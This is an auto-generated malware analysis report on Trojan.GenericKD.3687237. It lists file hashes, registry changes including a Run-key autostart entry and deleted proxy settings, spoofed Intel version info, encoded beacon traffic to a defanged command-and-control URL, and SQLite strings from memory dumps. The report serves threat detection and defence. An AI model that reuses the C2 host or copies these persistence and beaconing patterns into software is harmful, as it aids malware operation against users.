Trojan.GenericKD.3687237_f97162f035

by malwarelabrobot on November 22nd, 2016 in Malware Descriptions.

Trojan.GenericKD.3687237 (B) (Emsisoft), Trojan.GenericKD.3687237 (AdAware), GenericPhysicalDrive0.YR (Lavasoft MAS)
Behaviour: Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: f97162f035314ea96a7edd7ee7e58005
SHA1: c1033f0de42c52cfed8ad226de04272dde4322cf
SHA256: c7e4add89df78bef818bf6cdd00925d57a7de0b6fe068aa8855c1ad222c1e1c1
SSDeep: 49152:KlOTN6ZHJtvTQJrJFBPPCZP8hP9jRH0E3LyDc/uGyb4ql:COxeJtrQJBPk8hltFYc/uDc
Size: 1896448 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: PolyEnE001byLennartHedlund, UPolyXv05_v6
Company: no certificate found
Created at: 2016-10-28 14:39:17
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):
No processes have been created.
The Trojan injects its code into the following process(es):

%original file name%.exe:2340

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

No files have been created.

Registry activity

The process %original file name%.exe:2340 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\f97162f035314ea96a7edd7ee7e58005_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad]
"WpadLastNetwork" = "{24C5EDBC-2851-452A-B521-5DA992F6C1B5}"

[HKLM\SOFTWARE\Microsoft\Tracing\f97162f035314ea96a7edd7ee7e58005_RASMANCS]
"EnableFileTracing" = "0"
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{24C5EDBC-2851-452A-B521-5DA992F6C1B5}]
"WpadDecisionTime" = "70 80 84 E5 0F 44 D2 01"

[HKLM\SOFTWARE\Microsoft\Tracing\f97162f035314ea96a7edd7ee7e58005_RASMANCS]
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{24C5EDBC-2851-452A-B521-5DA992F6C1B5}]
"WpadDecision" = "3"

[HKLM\SOFTWARE\Microsoft\Tracing\f97162f035314ea96a7edd7ee7e58005_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecision" = "3"

[HKLM\SOFTWARE\Microsoft\Tracing\f97162f035314ea96a7edd7ee7e58005_RASAPI32]
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionReason" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\f97162f035314ea96a7edd7ee7e58005_RASMANCS]
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 36 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{24C5EDBC-2851-452A-B521-5DA992F6C1B5}]
"WpadNetworkName" = "Network 2"

[HKLM\SOFTWARE\Microsoft\Tracing\f97162f035314ea96a7edd7ee7e58005_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\f97162f035314ea96a7edd7ee7e58005_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{24C5EDBC-2851-452A-B521-5DA992F6C1B5}]
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "46 00 00 00 09 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\f97162f035314ea96a7edd7ee7e58005_RASAPI32]
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionTime" = "70 80 84 E5 0F 44 D2 01"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"%original file name%.exe -start" = "c:\%original file name%.exe -start"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

Dropped PE files

There are no dropped PE files.

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: Intel Corporation
Product Name: Intel(R) Common User Interface
Product Version: 6.15.10.4425
Legal Copyright: Copyright 2012-2015, Intel Corporation
Legal Trademarks:
Original Filename: GFXUIEX.EXE
Internal Name: GFXUIEX
File Version: 6.15.10.4425
File Description: GFXUIEX Module
Comments:
Language: Language Neutral

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 203650 0 0 d41d8cd98f00b204e9800998ecf8427e
.rdata 208896 5692 0 0 d41d8cd98f00b204e9800998ecf8427e
.data 217088 1101240 0 0 d41d8cd98f00b204e9800998ecf8427e
.vmp0 1318912 1160212 0 0 d41d8cd98f00b204e9800998ecf8427e
.vmp1 2482176 1729896 1732608 5.48343 9cc49c4d5d51cec7f8ebe4bfb386a870
.rsrc 4214784 156784 159744 4.52362 75cc0fc2a17307ebef862753093c6295

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://api.faceboolad.com/api//send


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /api//send HTTP/1.1
Connection: Keep-Alive
Accept: */*
Referer: hXXp://VVV.facebook.com
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Server: KLzM9LxLuLbLzMsMzM7L6LCM2LwMwMWM4MmMWMFMFMiMWM4MFMwMOM7LCMLL4MWMUMtMCMWMCM4MFMLLtMtMmMxM7LzMcMzMWLpLtLbLzMsMxMcMzMiLbLmLzMsMzMdLDLwLuLxLOLFLnMUMnMrLaLWLDL1LRLWLbLnM7LuLDLWLDLxLwLnMvLbLmLiLDL9LbLnM5LRL9L4LnMxMnMsLiMWMnMkMjLULDLaLuLsMUMWMwMxMfMzMcMzMSLmLxLOLFLbLmLzMsMzMzMcMzMULFLbLmLzMsMzMzMcMzMtLRLFLFLzMsMzMzMcMzM9LxLxL4LDLbLFLzMsMzMzMcMzMRLDLuLzMsMwMcMzMULWLpLtLbLzMsMwMBT
Server-Key: MBZ2j6h7LINEXG38TP5oYvyrHdJ0lAgqnQzRS9ubkfVDc4a1wxtCmFWUiOspeK
Host: api.faceboolad.com


HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 326
Content-Type: text/plain; charset=gb2312
Expires: -1
Server: Microsoft-IIS/8.5
Server-Key: x0ZiEwlSg3FWKj82yNp5mJOeMhUXQ47cYu6DnLPasotBrbqvfkC9TGHdR1VIzA
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 21 Nov 2016 15:56:56 GMT
[CODE]x0ZiEwlSg3FWKj82yNp5mJOeMhUXQ47vKBKOKiKGENK3KNKaKNK3KNKAENKGENKO
KiKxmNKpKiK1KiKOKiKgKNKZKNKGENKGENKaKNKFKNKZKNKOKiKxmNKOKiKAENK8KNKCEN
KaKNK3KNKZKNKrKiKbKNKsKNKgKNK8KNKAENK3KNKZKNKMKNKHENKRKNKrKNKsKNKrKiKC
KNKaKNKGENK3KNKrKiK3KNKTKNKgKNKZKNKrKiKGENKAENKbKNKbKNKZKNKGENKGENKFKi
KOKiK2KNKcYu6DnLPasotBrbqvfkC9TGHdR1VIzA[CODE]HTTP/1.1 200 OK..Cache-C
ontrol: no-cache..Pragma: no-cache..Content-Length: 326..Content-Type:
 text/plain; charset=gb2312..Expires: -1..Server: Microsoft-IIS/8.5..S
erver-Key: x0ZiEwlSg3FWKj82yNp5mJOeMhUXQ47cYu6DnLPasotBrbqvfkC9TGHdR1V
IzA..X-AspNet-Version: 4.0.30319..X-Powered-By: ASP.NET..Date: Mon, 21
 Nov 2016 15:56:56 GMT..[CODE]x0ZiEwlSg3FWKj82yNp5mJOeMhUXQ47vKBKOKiKG
ENK3KNKaKNK3KNKAENKGENKOKiKxmNKpKiK1KiKOKiKgKNKZKNKGENKGENKaKNKFKNKZKN
KOKiKxmNKOKiKAENK8KNKCENKaKNK3KNKZKNKrKiKbKNKsKNKgKNK8KNKAENK3KNKZKNKM
KNKHENKRKNKrKNKsKNKrKiKCKNKaKNKGENK3KNKrKiK3KNKTKNKgKNKZKNKrKiKGENKAEN
KbKNKbKNKZKNKGENKGENKFKiKOKiK2KNKcYu6DnLPasotBrbqvfkC9TGHdR1VIzA[CODE]
....


GET /api//send HTTP/1.1


Connection: Keep-Alive
Accept: */*
Referer: hXXp://VVV.facebook.com
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Server: zJCEZJFJkJyJCEqECEgJRJNEHJmEmEBEfEuEBErErE5EBEfErEmETEgJNEJJfEBElEhENEBENEfErEJJhEhEuEFEgJCEwECEBJsJhJyJCEqEFEwECE5JyJuJCEqECEeJvJmJkJFJTJrJPElEPEdJaJBJvJSJMJBJyJPEgJkJvJBJvJFJmJPEYJyJuJ5JvJZJyJPEcJMJZJfJPEFEPEqJ5EBEPEnEpJlJvJaJkJqElEBEmEFEoECEwECE7JuJFJTJrJyJuJCEqECECEwECElJrJyJuJCEqECECEwECEhJMJrJrJCEqECECEwECEZJFJFJfJvJyJrJCEqECECEwECEMJvJkJCEqEmEwECElJBJsJhJyJCEqEmE02
Server-Key: 0EHIRpgVbJiGxD1Wt28cY4d3eKUjLAXO6PMCZ7ykonv9fwSaFmNhrulBT5sqzQ
Host: api.faceboolad.com


HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 326
Content-Type: text/plain; charset=gb2312
Expires: -1
Server: Microsoft-IIS/8.5
Server-Key: JsixuTmEf5lD3og2qQaWIbrdOC6KXZ9kHRyVvM8NFGpzPLSc04wt7Bj1UYnheA
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 21 Nov 2016 15:57:17 GMT
[CODE]JsixuTmEf5lD3og2qQaWIbrdOC6KXZ9xfFfhf3fufFfPfFfOfFfPfFf4JFfufFfh
f3f0f3f0J3faf3fhf3fMfFfqfFfufFfufFfOfFf5fFfqfFfhf3f0f3fhf3f4JFfYfFfUJF
fOfFfPfFfqfFflf3f2fFf7JFfMfFfYfFf4JFfPfFfqfFf1JFfmfFf0JFfffFf7JFflf3fb
fFfOfFfufFfPfFflf3fPfFfefFfMfFfqfFflf3fufFf4JFf2fFf2fFfqfFfufFfufFfIf3
fhf3fBftfkHRyVvM8NFGpzPLSc04wt7Bj1UYnheA[CODE]HTTP/1.1 200 OK..Cache-C
ontrol: no-cache..Pragma: no-cache..Content-Length: 326..Content-Type:
 text/plain; charset=gb2312..Expires: -1..Server: Microsoft-IIS/8.5..S
erver-Key: JsixuTmEf5lD3og2qQaWIbrdOC6KXZ9kHRyVvM8NFGpzPLSc04wt7Bj1UYn
heA..X-AspNet-Version: 4.0.30319..X-Powered-By: ASP.NET..Date: Mon, 21
 Nov 2016 15:57:17 GMT..[CODE]JsixuTmEf5lD3og2qQaWIbrdOC6KXZ9xfFfhf3fu
fFfPfFfOfFfPfFf4JFfufFfhf3f0f3f0J3faf3fhf3fMfFfqfFfufFfufFfOfFf5fFfqfF
fhf3f0f3fhf3f4JFfYfFfUJFfOfFfPfFfqfFflf3f2fFf7JFfMfFfYfFf4JFfPfFfqfFf1
JFfmfFf0JFfffFf7JFflf3fbfFfOfFfufFfPfFflf3fPfFfefFfMfFfqfFflf3fufFf4JF
f2fFf2fFfqfFfufFfufFfIf3fhf3fBftfkHRyVvM8NFGpzPLSc04wt7Bj1UYnheA[CODE]
....


GET /api//send HTTP/1.1


Connection: Keep-Alive
Accept: */*
Referer: hXXp://VVV.facebook.com
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Server: CcHiOcLc7cmcHi3iHitcucUifcNiNiDiYiaiDibibiriDiYibiNiTitcUiccYiDiviJiUiDiUiYibiccJiJiaiLitcHiQiHiDcKcJcmcHi3iLiQiHircmcacHi3iHijcBcNc7cLcTcbcMiviMiScxcDcBc8cqcDcmcMitc7cBcDcBcLcNcMizcmcacrcBcOcmcMiycqcOcYcMiLiMi3criDiMidiEcvcBcxc7c3iviDiNiLiFiHiQiHi9cacLcTcbcmcacHi3iHiHiQiHivcbcmcacHi3iHiHiQiHiJcqcbcbcHi3iHiHiQiHiOcLcLcYcBcmcbcHi3iHiHiQiHiqcBc7cHi3iNiQiHivcDcKcJcmcHi3iNioI
Server-Key: ioVfEuRtc5l6hgP4Iny0AzsSejkWw1ZpMXHq9O7mdFGBQYx8NLJUabDvrT3K2C
Host: api.faceboolad.com


HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 326
Content-Type: text/plain; charset=gb2312
Expires: -1
Server: Microsoft-IIS/8.5
Server-Key: LGSewnNmkyBgdjRZ9V5fIKsvDEzQHhiY36pbM2TCX7tcu4xlaJrFOWqoU018PA
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 21 Nov 2016 15:57:37 GMT
[CODE]LGSewnNmkyBgdjRZ9V5fIKsvDEzQHhiek4krkRkEk4kFk4kMk4kFk4kJk4kEk4kr
kRkJLRkbkRkokRkrkRkxk4knk4kEk4kEk4kMk4koL4knk4krkRkJLRkrkRkJk4kOk4ksk4
kMk4kFk4knk4kFLRkrL4kdk4kxk4kOk4kJk4kFk4knk4kVk4k7k4kbk4kzk4kdk4kFLRk1
k4kMk4kEk4kFk4kFLRkFk4k2k4kxk4knk4kFLRkEk4kJk4krL4krL4knk4kEk4kEk4kqLR
krkRkyk0LY36pbM2TCX7tcu4xlaJrFOWqoU018PA[CODE]HTTP/1.1 200 OK..Cache-C
ontrol: no-cache..Pragma: no-cache..Content-Length: 326..Content-Type:
 text/plain; charset=gb2312..Expires: -1..Server: Microsoft-IIS/8.5..S
erver-Key: ..

The Trojan connects to the servers at the folowing location(s):

%original file name%.exe_2340:

.text
`.rdata
@.data
.vmp0
.vmp1
.rsrc
f9z.vk
__MSVCRT_HEAP_SELECT
user32.dll
GDI32.dll
WINMM.dll
@.reloc
.FGy#
8_Eu.QP
 ] ;_ }9
.6.78.9:;
B.CDEFGH
large file support is disabled
unknown operation
SQL logic error or missing database
rekey
hexrekey
hexkey
foreign_keys
foreign_key_list
foreign_key_check
defer_foreign_keys
sqlite_compileoption_get
sqlite_compileoption_used
sqlite_crypt
sqlite_log
sqlite_source_id
sqlite_version
sqlite_attach
sqlite_detach
sqlite_stat4
sqlite_stat3
sqlite_stat1
sqlite_rename_parent
sqlite_rename_trigger
sqlite_rename_table
FOREIGN KEY
GetProcessHeap
RowKey
3.9.2
SQLite format 3
CREATE TABLE sqlite_master(
sql text
CREATE TEMP TABLE sqlite_temp_master(
REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYWITHOUTERELEASEATTACHAVINGROUPDATEBEGINNERECURSIVEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTRIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLY
@failed to allocate %u bytes of memory
failed memory resize %u to %u bytes
922337203685477580
Adelayed %dms for lock/sharing conflict at line %d
sqlite_user
misuse at line %d of [%.10s]
cannot open file at line %d of [%.10s]
SQLITE_
os_win.c:%d: (%lu) %s(%s) - %s
%s%c%s
%s(%d)
FOREIGN KEY constraint failed
%s prohibited in %s
%r %s BY term out of range - should be between 1 and %d
Expression tree is too large (maximum depth %d)
too many SQL variables
variable number must be between ?1 and ?%d
too many columns in %s
%s OR name=%Q
type='trigger' AND (%s)
table %s may not be altered
sqlite_
%s cannot use variables
access to %s.%s.%s is prohibited
access to %s.%s is prohibited
object name reserved for internal use: %s
duplicate column name: %s
too many columns on %s
DELETE FROM %Q.%s WHERE %s=%Q
sqlite_stat%d
cannot modify %s because it is a view
table %s may not be modified
foreign key mismatch - "%w" referencing "%w"
unknown or unsupported join type: %T %T%s%T
RIGHT and FULL OUTER JOINs are not currently supported
SELECTs to the left and right of %s do not have the same number of result columns
no such index: %s
table %s: xBestIndex returned an invalid plan
no such vfs: %s
%s mode not allowed: %s
no such %s mode: %s
FROM '%q'.'%q%s' AS x
,%s(x.'c%d%q')
,%s(?)
unknown tokenizer: %s
unrecognized matchinfo request: %c
>reserved fts5 column name: %s
unrecognized column option: %s
unindexed
-near %d
-col {%d
-col %d
, %d)
%s%s%z%s
no such tokenizer: %s
hex literal too big: %s
unknown column "%s" in foreign key definition
number of columns in foreign key does not match the number of columns in the referenced table
foreign key on %s should reference only one column of table %T
a JOIN clause is required before %s
duplicate WITH table name: %s
error during initialization: %s
no entry point [%s] in shared library [%s]
sqlite3_
unable to open shared library [%s]
%s.%s
sqlite3_extension_init
USE TEMP B-TREE FOR %s
COMPOUND SUBQUERIES %d AND %d %s(%s)
%s:%d
recursive reference in a subquery: %s
multiple recursive references: %s
table %s has %d values for %d columns
circular reference: %s
multiple references to recursive table: %s
SCAN TABLE %s%s%s
vtable constructor did not declare schema: %s
vtable constructor failed: %s
vtable constructor called recursively: %s
no such module: %s
%s.xBestIndex() malfunction
prefix length out of range: %d
%s-shm
unable to use function %s in the requested context
CREATE TABLE %Q.%s(%s)
%s %T cannot reference objects in database %s
sqlite_master
sqlite_temp_master
default value of column [%s] is not constant
UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d
%s.rowid
no such collation sequence: %s
cannot join using column %s - column not present in both tables
cannot have both ON and USING clauses in the same join
a NATURAL join may not have an ON or USING clause
column%d
UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d
too many arguments on %s() - max %d
json_%s() needs an odd number of arguments
parse error in rank function: %s
%s: %s
%s: %s.%s
%s: %s.%s.%s
misuse of aliased aggregate %s
not authorized to use function: %s
the "." operator
too many terms in %s BY clause
%.*s"%w"%s
%s%.*s"%w"
UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q
Cannot add a PRIMARY KEY column
automatic extension loading failed: %s
illegal first argument to %s
%s {%s}
d-d-d d:d:d
d:d:d
d-d-d
view %s is circularly defined
recursive aggregate queries not supported
LIMIT clause should come after %s not before
ORDER BY clause should come after %s not before
zeroblob(%d)
sqlite3_get_table() called with two or more incompatible queries
ANY(%s)
VIRTUAL TABLE INDEX %d:%s
USING INTEGER PRIMARY KEY (rowid%s?)
INDEX %s
COVERING INDEX %s
PRIMARY KEY
AS %s
TABLE %s
SUBQUERY %d
, T.c%d
%Q.'%q_%s'
parse error in "%s"
reserved fts5 table name: %s
no such column: %s
{%ssegid=%d h=%d pgno=%d}
{id=%d leaves=%d..%d}
{lvl=%d nMerge=%d nSeg=%d
%d(%lld)
porter
?API call with %s database connection pointer
cannot limit WAL size: %s
2nd reference to page %d
invalid page number %d
automatic index on %s(%s)
database corruption at line %d of [%.10s]
recovered %d frames from WAL file %s
bind on a busy prepared statement: [%s]
%z - %s
malformed database schema (%s)
Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)
Failed to read ptrmap key=%d
failed to get page %d
%d of %d pages missing from overflow list starting at %d
freelist leaf count too big on page %d
recovered %d pages from %s
unknown database: %s
Fragmentation of %d bytes reported as %d on page %d
Multiple uses for byte %u of page %d
Offset %d out of range %d..%d
On page %d at right child:
On tree page %d cell %d:
unable to get the page. error code=%d
btreeInitPage() returns error code %d
Page %d:
Pointer map page %d is referenced
Page %d is never used
INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')
at most %d tables in a join
unknown database %s
DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'
DELETE FROM %Q.sqlite_sequence WHERE name=%Q
MJ delete: %s
-mjX9X
MJ collide: %s
%s-mjXXXXXX9XXz
database %s is locked
cannot detach database %s
no such database: %s
database schema is locked: %s
INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'
SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'
SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
PRAGMA vacuum_db.synchronous=OFF
cannot VACUUM - SQL statements in progress
SELECT %s WHERE rowid = ?
INSERT INTO %Q.'%q_content' VALUES(%s)
SELECT %s WHERE rowid=?
SELECT %s FROM %s AS T
REPLACE INTO %Q.'%q_content' VALUES(%s)
SELECT %s FROM %s T WHERE T.%Q=?
SELECT %s FROM %s T WHERE T.%Q <= ? AND T.%Q >= ? ORDER BY T.%Q DESC
SELECT %s FROM %s T WHERE T.%Q >= ? AND T.%Q <= ? ORDER BY T.%Q ASC
CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
CREATE TABLE %Q.'%q_content'(%s)
%z, 'c%d%q'
docid INTEGER PRIMARY KEY
ALTER TABLE %Q.'%q_%s' RENAME TO '%q_%s';
fts5: error creating shadow table %q_%s: %s
CREATE TABLE %Q.'%q_%q'(%s)%s
SELECT tbl,idx,stat FROM %Q.sqlite_stat1
SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid
unsupported file format
no such trigger: %S
no such table column: %s.%s
malformed MATCH expression: [%s]
FTS expression tree is too large (maximum depth %d)
statement aborts at %d: [%s] %s
abort at %d in [%s]: %s
%s constraint failed
%s constraint failed: %s
database table is locked: %s
cannot change %s wal mode from within a transaction
SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid
cannot commit transaction - SQL statements in progress
cannot release savepoint - SQL statements in progress
no such savepoint: %s
cannot open savepoint - SQL statements in progress
sqlite_sequence
there is already an index named %s
DELETE FROM %Q.%s WHERE name=%Q AND type='index'
index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped
no such index: %S
unable to identify the object to be reindexed
unsupported encoding: %s
NULL value in %s.%s
*** in database %s ***
no such table: %s
%s.%s.%s
'%s' is not a function
too many references to "%s": max 65535
sqlite_sq_%p
expected %d columns for '%s' but got %d
cannot create INSTEAD OF trigger on table: %S
cannot create %s trigger on view: %S
cannot open value of type %s
cannot open %s column for writing
no such column: "%s"
cannot open view: %s
cannot open table without rowid: %s
cannot open virtual table: %s
indexed
foreign key
EXECUTE %s%s SUBQUERY %d
there is already another table or index with this name: %s
UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q
UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
view %s may not be altered
sqlite_altertab_%s
INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
CREATE%s INDEX %.*s
expressions prohibited in PRIMARY KEY and UNIQUE constraints
sqlite_autoindex_%s_%d
index %s already exists
there is already a table named %s
virtual tables may not be indexed
views may not be indexed
table %s may not be indexed
cannot create a TEMP index on non-TEMP table "%s"
PRAGMA %Q.page_size
SELECT 1 FROM %Q.sqlite_master WHERE tbl_name='%q_stat'
%s_segments
SELECT stat FROM %Q.sqlite_stat1 WHERE tbl = '%q_rowid'
CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
invalid fts5 file format (found %d, expected %d) - run 'rebuild'
wrong number of arguments to function %s
segid, term, pgno, PRIMARY KEY(segid, term)
id INTEGER PRIMARY KEY, block BLOB
%s_data
SELECT segid, term, (pgno>>1), (pgno&1) FROM %Q.'%q_idx' WHERE segid=%d
SELECT rowid, rank FROM %Q.%Q ORDER BY %s(%s%s%s) %s
no such function: %s
SELECT %s
SELECT count(*) FROM %Q.'%q_%s'
no such fts5 table: %s.%s
SELECT pw=sqlite_crypt(?1,pw), isAdmin FROM "%w".sqlite_user WHERE uname=?2
INSERT INTO sqlite_user(uname,isAdmin,pw) VALUES(%Q,%d,sqlite_crypt(?1,NULL))
CREATE TABLE sqlite_user(
uname TEXT PRIMARY KEY,
UPDATE sqlite_user SET isAdmin=%d, pw=sqlite_crypt(?1,NULL) WHERE uname=%Q
DELETE FROM sqlite_user WHERE uname=%Q
unable to open database: %s
Invalid key value
database %s is already in use
too many attached databases - max %d
AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY
table "%s" has more than one primary key
CREATE TABLE %Q.sqlite_sequence(name,seq)
UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d
CREATE %s %.*s
PRIMARY KEY missing on table %s
%d %d %d %d
k PRIMARY KEY, v
id INTEGER PRIMARY KEY, sz BLOB
, c%d
id INTEGER PRIMARY KEY
misuse of aggregate: %s()
SELECT %s WHERE rowid BETWEEN %lld AND %lld ORDER BY rowid %s
SELECT %s ORDER BY rowid %s
%s: table does not support scanning
cannot %s contentless fts5 table: %s
%d values for %d columns
table %S has %d columns but %d values were supplied
table %S has no column named %s
-- TRIGGER %s
use DROP VIEW to delete view %s
use DROP TABLE to delete table %s
table %s may not be dropped
sqlite_stat
the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers
the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers
CREATE TABLE x(%s %Q HIDDEN, docid HIDDEN, %Q HIDDEN)
missing %s parameter in fts4 constructor
error parsing prefix parameter: %s
unrecognized order: %s
unrecognized matchinfo: %s
unrecognized parameter: %s
notindexed
%s, %s
CREATE TABLE x(%s
CREATE TABLE x(key,value,type,atom,id,parent,fullkey,path,json HIDDEN,root HIDDEN)
%z, %Q HIDDEN, %s HIDDEN)
%z%s%Q
Visual C   CRT: Not enough memory to complete call to strerror.
Broken pipe
Inappropriate I/O control operation
Operation not permitted
%S#[k
?#%X.y
